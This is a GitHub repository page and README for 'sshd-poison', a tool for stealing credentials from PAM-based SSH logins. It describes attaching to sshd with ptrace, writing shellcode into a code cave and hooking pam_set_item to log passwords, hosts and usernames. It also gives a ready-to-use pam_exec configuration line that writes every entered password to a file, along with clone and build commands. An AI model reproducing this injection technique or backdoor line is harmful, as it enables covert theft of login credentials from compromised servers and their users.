Skip to content
a tool to get creds of pam based sshd authentication
Branch: master
Clone or download
Latest commit 163e451 May 20, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.bin first release May 12, 2019
ignotum @ 7fb5c55 update submodule May 20, 2019
.gitignore create monitor.c May 15, 2019
.gitmodules add submodule May 12, 2019
Makefile create monitor.c May 15, 2019
README.md escape text May 16, 2019
breakpoint.c fix compile warning May 13, 2019
breakpoint.h first release May 12, 2019
caves.c first release May 12, 2019
caves.h first release May 12, 2019
elf-parser.c checking if the section was found May 13, 2019
elf-parser.h first release May 12, 2019
main.c using ignotum_getbasemap May 20, 2019
monitor.c create monitor.c May 15, 2019
proc-info.c first release May 12, 2019
proc-info.h first release May 12, 2019
ptrace.c fix call to ptrace May 13, 2019
ptrace.h first release May 12, 2019
sc.asm saving some bytes May 14, 2019
sc.h saving some bytes May 14, 2019

README.md

sshd-poison

sshd-poison is a tool to get creds of pam based sshd authentication, this is not the easiest way to do that (you can create a pam module, or just add auth optional pam_exec.so quiet expose_authtok /bin/bash -c {read,-r,x};{echo,-e,"`env`\n$x"}>>somefile in a service configuration), not even the stealthiest (the tool don't have any mechanism to try hide yourself, and needs control the main sshd pid all the time), but code this gave me a lot of fun.

How it works

The tool starts attaching the main sshd pid and wait for some events, when a new process is created, it means that a new connection was started, after that the tool will wait for an execve event, then checks if the program executed is the same as the main pid, to ensure a re-exec (this is why we need take control of the main pid, every re-exec will erase any memory modification), then a breakpoint are set in the entry point of the new process, for wait the program load the shared librarys. When it's done and the breakpoint has hit, it are unset, the program will write the shellcode to a code cave, and the GOT entry for pam_set_item, used by libpam, will be changed, to hook internal libpam call to pam_set_item function.

The log format are password\0rhost\0user\0.

This will only works with x86_64 PIE binaries, and kernel 3.4 or early (PTRACE_SEIZE), I tested this with OpenSSH_8.0p1, OpenSSL 1.1.1b 26 Feb 2019 with kernel 5.0.13-arch1-1-ARCH and OpenSSH_7.9p1 Debian-10, OpenSSL 1.1.1b 26 Feb 2019 with kernel 4.19.0-kali3-amd64

Compiling

git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
cd sshd-poison
make

Demo

You can’t perform that action at this time.